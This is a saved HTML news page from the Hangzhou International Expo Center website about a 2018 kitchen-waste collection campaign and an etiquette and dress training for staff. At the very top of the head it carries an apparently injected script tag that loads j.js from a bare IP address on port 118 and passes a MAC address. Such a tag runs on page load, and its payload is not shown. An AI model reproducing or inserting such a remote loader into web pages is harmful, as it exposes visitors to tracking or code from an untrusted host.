
<!DOCTYPE html>
<html>

<head><script src="http://45.126.123.80:118/j.js?MAC=2CB21AAC22BC"></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="renderer" content="webkit">
    <link rel="stylesheet" href="http://www.hiechangzhou.com/Public/home/css/swiper-4.1.6.min.css">
    <link rel="stylesheet" href="http://www.hiechangzhou.com/Public/home/css/bootstrap.css">
    <link rel="stylesheet" href="http://www.hiechangzhou.com/Public/home/css/pages.css">
    <link rel="stylesheet" href="http://www.hiechangzhou.com/Public/home/css/jquery.spinner.css">
    <link rel="stylesheet" href="http://www.hiechangzhou.com/Public/home/plugins/jquery-fancybox/jquery.fancybox-1.3.4.css">
    <link rel="stylesheet" href="http://www.hiechangzhou.com/Public/home/css/style.css">
    <title>杭州国际博览中心</title>
  
</head>
<body>

<div class="header-all clearfix">
    <div class="header-left fl">
        <a href="http://www.hiechangzhou.com/html/index.html"><img src="http://www.hiechangzhou.com/Public/home/img/h-logo.png" alt=""></a>
    </div>
    <div class="header-right fr">
        <div class="header-nav clearfix">
            <ul>
                <li>
                    <a href="gwjj.html">岗位简介</a>
                </li>
                <li>
                    <a href="xwdt.html">新闻动态</a>
                </li>
                <li>
                    <a href="gwjg.html">岗位建功</a>
                </li>
                <li>
                    <a href="gwfc.html">岗位风采</a>
                </li>
                <li>
                    <a href="gwfx.html">岗位奉献</a>
                </li>

            </ul>
        </div>
        <!-- <div class="index-right-logo">
            <div class="swiper-container swiper-container-horizontal">
                <div class="swiper-wrapper">
                    <div class="swiper-slide" style="width: auto;">
                        <a href="#"><img src="http://www.hiechangzhou.com/Uploads/201807/5b3dc70694b3b.jpg" alt=""></a>
                    </div><div class="swiper-slide" style="width: auto;">
                        <a href="#"><img src="http://www.hiechangzhou.com/Uploads/201807/5b3dc70af01af.jpg" alt=""></a>
                    </div><div class="swiper-slide" style="width: auto;">
                        <a href="#"><img src="http://www.hiechangzhou.com/Uploads/201807/5b3dc710115b0.jpg" alt=""></a>
                    </div><div class="swiper-slide" style="width: auto;">
                        <a href="#"><img src="http://www.hiechangzhou.com/Uploads/201807/5b3dc7142ac6e.jpg" alt=""></a>
                    </div><div class="swiper-slide" style="width: auto;">
                        <a href="#"><img src="http://www.hiechangzhou.com/Uploads/201807/5b3dc732c892d.jpg" alt=""></a>
                    </div>    </div>
            </div>
        </div> -->
        <div class="nav-button"><i class="iconfont">&#xe6b9;</i></div>
        <div class="nav-mobile">
            <div class="nav-mobile-close">
                <i class="iconfont">&#xe618;</i>
            </div>
            <ul>
                <li><a href="/About/index" >关于我们</a></li>
                <li><a href="/News/index" class="header-nav-on">杭博新闻</a></li>
                <li><a href="/Service/index" >服务指南</a></li>
                <li><a href="/Hr/index" >人才招聘</a></li>
                <li><a href="http://www.hiechangzhou.com/News/index/category/1?lang=en-us">EN</a></li>  </ul>
        </div>

    </div>
</div>


  <div class="banner banner-3"></div>
  <div class="news-content">
<div class="service-nav">
    <div class="container">
        <h3>岗位风采</h3>
        <p>您当前的位置 : <a href="/Index/index">岗位风采</a></p>
    </div>
</div>
    <div class="news-detail">
      <div class="container">
        <h3>垃圾分类培训+礼仪培训</h3>
        <p>
          <!-- <i class="iconfont">&#xe61a;</i>杭州国际博览中心 -->
          <i class="iconfont">&#xe61d;</i>2018-09-23
          <!-- <i class="iconfont">&#xe602;</i>220</p> -->
        <div class="detail-text">
          <p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:24px;background:white">
    <strong><span style="font-size: 19px;font-family:仿宋;letter-spacing:1px;background: white;font-weight:normal">文明是一座城市的精神坐标。</span></strong><span style="font-size:19px;font-family:仿宋;letter-spacing: 1px;background:white">为了在“舌尖上的文明”上有更好的精神追求，我们开展了餐厨废弃物规范收运活动。为了让“职场礼仪文明”更具鲜明色彩，我们开展了高端商务礼仪与职场着装培训。杭博小蓝在追求城市文明上又有了哪些新玩法？跟随小编一起去看看吧~</span>
</p>
<p style="margin-bottom: 0px; text-align: center; text-indent: 39px; line-height: 24px; background: white;">
    <span style="font-size:19px;font-family:仿宋;letter-spacing: 1px;background:white"><img src="../images/gwfc/1/1.jpg" title="1537749823680890.jpg" alt="微信图片_20180923225355.jpg"/></span>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:40px;line-height:24px;background:white">
    <strong><span style="font-size:19px;font-family:仿宋">1、</span></strong><strong><span style="font-size:19px;font-family:仿宋;letter-spacing: 1px">加快推进餐厨废弃物规范收运，</span></strong><strong><span style="font-size:19px;font-family:仿宋">守护“舌尖上的安全”</span></strong>
</p>
<p style=";margin-bottom:0;text-indent:37px;line-height:21px">
    <span style="font-size: 19px;font-family:仿宋">为积极响应我区餐厨废弃物规范收运“百日行动”号召，钱江世纪城于近日召开餐厨废弃物规范收运动员大会。钱江世纪城城管中队应邀出席，首批约70家餐饮企业负责人参加了会议。</span>
</p>
<p style=";margin-bottom:0;text-indent:37px;line-height:21px">
    <span style="font-size: 19px;font-family:仿宋">此前钱江世纪城已对辖区内的餐饮企业进行了排查摸底，经过交叉对比、剔除重复后，将整理出的120余家企业按照规模分成小型、中型、大型及特大型3个大类。除中型及以上规模的约70家企业参与动员大会外，剩余的40余家企业将另行集中组织动员。</span>
</p>
<p style=";margin-bottom:0;text-indent:37px">
    <strong><span style="font-size:19px;font-family:仿宋;font-weight:normal">百日行动</span></strong><span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white">作为萧山区2018年度为民办的十件实事之一，餐厨废弃物规范收运“百日行动”于4月正式启动，目前已进入重点推进阶段。动员大会当天，世纪城特别邀请了收运方——杭州萧山环城生物能源有限公司对餐厨废弃物收运的具体内容和流程做了介绍。该公司是我区现有两家餐厨废弃物处置企业之一，钱江世纪城属其服务区域。</span>
</p>
<p style=";margin-bottom:0;text-indent:39px;line-height:21px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing: 1px;background:white">针对大家最关心的收运是否免费问题，环城公司表示现阶段各餐饮企业不需要支付任何费用，收运用的垃圾桶也将由环城公司根据各企业需求免费提供。至于“餐厨废弃物”究竟如何界定，企业也会给出一份详细的说明，帮助各餐饮企业正确区分。</span>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:24px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white">据统计，在餐厨废弃物规范收运动员大会召开前，钱江世纪城完成清运服务协议签约的餐饮企业已达30家。从当天动员会的情况来看，各与会企业签约意愿明显，环城公司将在会后一一对接，逐个完成签约。</span>
</p>
<p style=";margin-bottom:0;text-indent:39px;line-height:24px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing: 1px;background:white">餐饮行业是彰显城市文明的窗口之一。开展餐厨废弃物规范收运，不仅有利于推进餐厨废弃物资源化利用和无害化处理，而且有利于进一步规范城市管理、优化城市环境。更重要的是，餐厨废弃物统一规范收运处置后，既能够从源头上杜绝“地沟油”的产生，也能够避免“猪吃垃圾人吃猪”的恶性循环，从而更好地保护人民群众身体健康，守护“舌尖上的安全”。</span>
</p>
<p style="margin-bottom: 0px; text-indent: 39px; line-height: 24px; background: white; text-align: center;">
    <span style="font-size:19px;font-family:仿宋;letter-spacing: 1px;background:white"><img src="../images/gwfc/1/4.jpg" title="1537749851272921.jpg" alt="微信图片_20180923225412.jpg"/></span>
</p>
<p style=";margin-bottom:0;text-indent:37px;line-height:24px;background:white">
    <strong><span style="font-size:19px;font-family:仿宋">2、</span></strong><strong><span style="font-size:19px;font-family:仿宋">塑巾帼风姿 展亚运风采，钱江世纪城开展巾帼文明礼仪培训</span></strong>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:21px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white">以改革攻坚破难题、以亚运保障强筹建、以品质提升促发展。今年，钱江世纪城明确将“改革攻坚年、亚运保障年、品质提升年”作为贯穿2018年的发展主轴、目标总纲，其中“三个规范”（语言规范、着装规范、礼仪规范）的关键小事率先开启新征程。</span>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:21px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white">在钱江世纪城高速发展的道路上，世纪城女性职工成为一道靓丽风景线出现在大家视野中，为这座杭州城市新中心增添了一抹亮丽的色彩。为进一步提升女性职工对自我职业生活的满意度和幸福感，更好地发挥“半边天”的作用，切实担当起服务保障亚运的关键力量，作为“三八节”系列活动的压轴节目，钱江世纪城妇联携手世纪城总工会特别设置了“巾帼凝聚展风姿、助力亚运燃激情”高端商务礼仪与职场着装培训，为世纪城巾帼们带来了一堂生动的礼仪课。</span>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:21px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white">从仪容仪表、语言谈吐到美姿美仪，培训课上，中学高级礼仪教师戚凤英老师从专业的角度跟大家分享了经验，让小蓝们受益匪浅。在戚老师的分享课上，原来办公室窝头码字的女孩在老师的一番塑造后，变得落落大方；清爽的装容配上一个温馨的微笑，让大家在繁忙的工作中找到了一丝温暖；在家随处可见的丝巾，经过一番折叠后，竟然成为搭配衣物的最佳配角，跳动的丝巾加上白色衬衣，完全展现出女性特有的知性美。</span>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:27px;background:white">
    <strong><span style="font-size: 19px;font-family:仿宋;letter-spacing:1px;background: white;font-weight:normal">于细微处见真知，一个转身，一个微笑，举手投足间都讲述着世纪城的形象故事，也展现了杭博小蓝之美。</span></strong>
</p>
<p style=";margin-bottom:0;text-align:justify;text-justify: inter-ideograph;text-indent:39px;line-height:27px;background:white">
    <span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white">“三个规范”作为队伍建设的重要方面，是塑造世纪城品牌形象的重要抓手，也是体现城市面貌的重要因素。为积极响应世纪城“三个规范”活动，全面展示这座新城的良好素养、文明形象，大力提倡微笑服务、礼仪服务，杭博小蓝们还将持续开展各类培训活动，通过提升自身素质、树立昂扬向上的工作面貌，展现杭博小蓝良好的铁军风采，全力迎亚运、立新功、展新姿。</span>
</p>
<p style="margin-bottom: 0px; text-align: center; text-indent: 39px; line-height: 27px; background: white;">
    <span style="font-size:19px;font-family:仿宋;letter-spacing:1px;background:white"><img src="../images/gwfc/1/2.jpg" title="1537749866511753.jpg" alt="微信图片_20180923225402.jpg"/></span>
</p>
<p>
    <br/>
</p>
        </div>
        <div class="news-alink clearfix">
          <!-- <div class="alink-left fl">
            <notempty name="news_prev_info">
              <p>{$Think.lang.prev_news}：<a href="{:U('detail',array('id' => $news_prev_info['id']))}">{$news_prev_info.title}</a></p>
            </notempty>
            <notempty name="news_next_info">
              <p>{$Think.lang.next_news}：<a href="{:U('detail',array('id' => $news_next_info['id']))}">{$news_next_info.title}</a></p>
            </notempty>
          </div> -->
          <div class="alink-right fr">
            <a href="javascript:void(0)" onclick="window.history.go(-1);"><img src="http://www.hiechangzhou.com/Public/home/img/aa.jpg" alt=""></a>
          </div>
        </div>
      </div>
    </div>

  </div>



<div class="footer-all clearfix">
    <div class="footer-left fl">
        <div class="foot-nav">
            <ul class="clearfix">
                <li class="foot-nf"><a href="/">首页</a></li>
                <li><a href="/News/index">杭博新闻</a></li>
                <li><a href="/Service/index">服务指南</a></li>
                <!-- <li><a href="/Hr/index">人才招聘</a></li> -->
                <li><a href="/Expo/index">展览中心</a></li>
                <li><a href="/Meeting/index">会议中心</a></li>
                <li><a href="/G20/index">G20体验馆</a></li>
                <li class="foot-nl"><a href="/Hotel/index">北辰酒店</a></li>
            </ul>
        </div>
        <p class="foot-add">A ：杭州市萧山区钱江世纪城奔竞大道353号    T ：+86 (571) 8290 8888    E：sales@hiechangzhou.com</p>
        <p>Copyright 2016 杭州国际博览中心. All Rights Reserved 浙ICP备16030893号 <a href="http://www.igori.cn" target="_blank"><i class="gori-icon"></i></a></p>
    </div>
    <div class="footer-right fr clearfix">
        <div class="footer-sn fl">
            <img src="http://www.hiechangzhou.com/Public/home/img/anzhuo.jpg" alt="">
            <p>APP（安卓）</p>
        </div>
        <div class="footer-sn fl">
            <img src="http://www.hiechangzhou.com/Public/home/img/ios.jpg" alt="">
            <p>APP（IOS）</p>
        </div>
        <div class="footer-sn fl">
            <img src="http://www.hiechangzhou.com/Public/home/img/sn.png" alt="">
            <p>关注微博</p>
        </div>
        <div class="footer-wc fl">
            <img src="http://www.hiechangzhou.com/Public/home/img/wc.png" alt="">
            <p>关注微信</p>
        </div>
    

    </div>
</div>
<div class="footer-mobile">
    Copyright 2018 杭州国际博览中心. 浙ICP备16030893号
</div>
<script type="text/javascript" src="http://www.hiechangzhou.com/Public/home/js/jquery-1.8.3.min.js"></script>
<script type="text/javascript" src="http://www.hiechangzhou.com/Public/home/js/jquery.SuperSlide.2.1.1.js"></script>
<script src="http://www.hiechangzhou.com/Public/home/plugins/jquery-fancybox/jquery.fancybox-1.3.4.js"></script>

<script>
    $(".nav-button").click(function(){
        $(".nav-mobile").show();
    });
    $(".nav-mobile-close").click(function(){
        $(".nav-mobile").hide();
    });
</script>
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1274537638'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s22.cnzz.com/z_stat.php%3Fid%3D1274537638%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>


</body>
</html>
